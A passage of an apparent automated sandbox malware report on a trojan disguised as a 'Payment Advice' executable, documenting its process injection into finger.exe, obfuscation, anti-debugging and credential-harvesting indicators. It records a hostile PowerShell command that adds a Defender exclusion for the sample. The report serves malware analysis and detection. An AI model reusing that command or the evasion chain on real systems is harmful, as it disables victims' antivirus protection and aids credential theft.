                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000000.1699625985.0000000000422000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamenkffT.exe" vs Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1864506338.0000000000A1E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1867220338.00000000027F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1884536468.00000000059AD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePowerShell.EXE vs Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1876693113.00000000037B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1882139046.0000000005140000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1887651837.0000000007130000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000004.00000002.2234595226.000000000179D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000004.00000002.2234307143.0000000001157000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefinger.exej% vs Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000004.00000002.2234307143.0000000001147000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefinger.exej% vs Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Binary or memory string: OriginalFilenamenkffT.exe" vs Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.7130000.4.raw.unpack, sb5XVGprnYjbJ1UAnT.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.7130000.4.raw.unpack, KV0H4piSssSUaiaZNB.cs Security API names: _0020.SetAccessControl
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.7130000.4.raw.unpack, KV0H4piSssSUaiaZNB.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.7130000.4.raw.unpack, KV0H4piSssSUaiaZNB.cs Security API names: _0020.AddAccessRule
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.3886830.1.raw.unpack, KV0H4piSssSUaiaZNB.cs Security API names: _0020.SetAccessControl
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.3886830.1.raw.unpack, KV0H4piSssSUaiaZNB.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.3886830.1.raw.unpack, KV0H4piSssSUaiaZNB.cs Security API names: _0020.AddAccessRule
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.3886830.1.raw.unpack, sb5XVGprnYjbJ1UAnT.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@10/7@14/8
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.log
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7320:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ousv2hhu.pyn.ps1
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: finger.exe, 00000009.00000003.2417472699.00000000034B5000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3551915780.00000000034D5000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000009.00000003.2417663608.00000000034D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe ReversingLabs: Detection: 65%
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Virustotal: Detection: 38%
                Source: unknown Process created: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe"
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe"
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Process created: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe Process created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"
                Source: C:\Windows\SysWOW64\finger.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windowscodecs.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, dwrite.dll, iconcodecservice.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, msisip.dll, gpapi.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: mswsock.dll, wininet.dll, kernel.appcore.dll, uxtheme.dll, ieframe.dll, iertutil.dll, netapi32.dll, version.dll, userenv.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll, dpapi.dll, cryptbase.dll
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe Section loaded: wininet.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, fwpuclnt.dll, rasadhlp.dll
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: Window Recorder Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\finger.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: finger.pdb source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000004.00000002.2234307143.0000000001147000.00000004.00000020.00020000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 00000008.00000002.3552384724.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: vTCmFjyxUmdTJX.exe, 00000008.00000002.3551724972.000000000077E000.00000002.00000001.01000000.0000000C.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000000.2305994823.000000000077E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000009.00000003.2234352082.000000000366C000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000009.00000003.2236364471.0000000003813000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, finger.exe, finger.exe, 00000009.00000003.2234352082.000000000366C000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000009.00000003.2236364471.0000000003813000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: finger.pdbGCTL source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000004.00000002.2234307143.0000000001147000.00000004.00000020.00020000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 00000008.00000002.3552384724.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.7130000.4.raw.unpack, KV0H4piSssSUaiaZNB.cs .Net Code: zKmE2ANmT9 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.3886830.1.raw.unpack, KV0H4piSssSUaiaZNB.cs .Net Code: zKmE2ANmT9 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.5140000.3.raw.unpack, L2.cs .Net Code: System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Code function: 0_2_025B465B push edx; retf 0_2_025B4662
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Code function: 0_2_025B4658 push edx; retf 0_2_025B465A
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Code function: 0_2_025B46BB push edx; retf 0_2_025B46BE
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Code function: 0_2_025B46B8 push edx; retf 0_2_025B46BA
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Code function: 0_2_025B46BF push edx; retf 0_2_025B46C2
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Code function: 0_2_025B477B push ebp; retf 0_2_025B4782
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Code function: 0_2_025B47B1 push esi; retf 0_2_025B47B2
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Code function: 0_2_025BA560 pushfd ; retf 0_2_025BA7BA
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Code function: 0_2_025BC99B push cs; iretd 0_2_025BC99E
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Code function: 0_2_025B5E00 push eax; iretd 0_2_025B5E09
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Code function: 0_2_025B9D93 push ss; iretd 0_2_025B9D96
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Code function: 0_2_04D5148B push esp; iretd 0_2_04D51496
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Code function: 0_2_04D557F8 pushfd ; iretd 0_2_04D55802
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Code function: 0_2_04D51793 push esi; iretd 0_2_04D5179E
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Code function: 0_2_04D5179F push edi; iretd 0_2_04D517BE
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Code function: 0_2_04D51084 push edi; iretd 0_2_04D51092
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Code function: 0_2_04D51043 push esp; iretd 0_2_04D51046
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Code function: 0_2_04D522A2 push ebp; iretd 0_2_04D522A3
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Code function: 0_2_04D563D0 pushfd ; iretd 0_2_04D563D6
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Code function: 0_2_04D50F13 push esp; iretd 0_2_04D50F1E
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Code function: 0_2_04DA97E8 push eax; iretd 0_2_04DA97F6
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Code function: 0_2_04DAECF9 push eax; iretd 0_2_04DAED06
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Code function: 0_2_06BE1EA1 push esp; iretd 0_2_06BE1EAD
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Code function: 4_2_0041605F push ecx; iretd 4_2_00416097
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Code function: 4_2_00416063 push ecx; iretd 4_2_00416097
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Code function: 4_2_00416833 push edx; iretd 4_2_00416835
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Code function: 4_2_00414884 push FFFFFFEBh; iretd 4_2_00414887
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Code function: 4_2_004018BF push ds; ret 4_2_004018C8
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Code function: 4_2_00412118 push esi; retf 4_2_00412119
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Code function: 4_2_0040DA11 push ecx; retf 4_2_0040DA30
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Code function: 4_2_004022BC push ds; ret 4_2_004022BD
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Static PE information: section name: .text entropy: 7.810640968604701
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.7130000.4.raw.unpack: High entropy of concatenated method names
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.3886830.1.raw.unpack: High entropy of concatenated method names
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe File created: \payment advice - advice refa2dgov46mcnu -usd priority payment.exe

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\finger.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match File source: Process Memory Space: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe PID: 1740, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\finger.exe API/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Memory allocated: 25B0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Code function: 4_2_016E096E rdtsc 4_2_016E096E
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6397
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 515
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\finger.exe API coverage: 2.6 %
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe TID: 4248 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7464 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7448 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\finger.exe TID: 7780 Thread sleep count: 36 > 30
                Source: C:\Windows\SysWOW64\finger.exe TID: 7780 Thread sleep time: -72000s >= -30000s
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe TID: 7836 Thread sleep time: -45000s >= -30000s
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe TID: 7836 Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\SysWOW64\finger.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_02F5C9E0 FindFirstFileW,FindNextFileW,FindClose,9_2_02F5C9E0
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1864777192.0000000000A8E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                Source: finger.exe, 00000009.00000002.3551915780.000000000345E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: vTCmFjyxUmdTJX.exe, 0000000A.00000002.3552632470.000000000169F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllss
                Source: firefox.exe, 0000000B.00000002.2536082481.0000019E4219C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll==
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\finger.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Code function: 4_2_00417DC3 LdrLoadDll,4_2_00417DC3
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Code function: 4_2_01774164 mov eax, dword ptr fs:[00000030h] 4_2_01774164
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01722349 mov eax, dword ptr fs:[00000030h]4_2_01722349
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01722349 mov eax, dword ptr fs:[00000030h]4_2_01722349
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01722349 mov eax, dword ptr fs:[00000030h]4_2_01722349
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01722349 mov eax, dword ptr fs:[00000030h]4_2_01722349
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01722349 mov eax, dword ptr fs:[00000030h]4_2_01722349
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01722349 mov eax, dword ptr fs:[00000030h]4_2_01722349
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01722349 mov eax, dword ptr fs:[00000030h]4_2_01722349
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01722349 mov eax, dword ptr fs:[00000030h]4_2_01722349
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01778324 mov eax, dword ptr fs:[00000030h]4_2_01778324
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01778324 mov ecx, dword ptr fs:[00000030h]4_2_01778324
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01778324 mov eax, dword ptr fs:[00000030h]4_2_01778324
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01778324 mov eax, dword ptr fs:[00000030h]4_2_01778324
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016DA30B mov eax, dword ptr fs:[00000030h]4_2_016DA30B
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016DA30B mov eax, dword ptr fs:[00000030h]4_2_016DA30B
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016DA30B mov eax, dword ptr fs:[00000030h]4_2_016DA30B
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0169C310 mov ecx, dword ptr fs:[00000030h]4_2_0169C310
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016C0310 mov ecx, dword ptr fs:[00000030h]4_2_016C0310
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016B03E9 mov eax, dword ptr fs:[00000030h]4_2_016B03E9
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016B03E9 mov eax, dword ptr fs:[00000030h]4_2_016B03E9
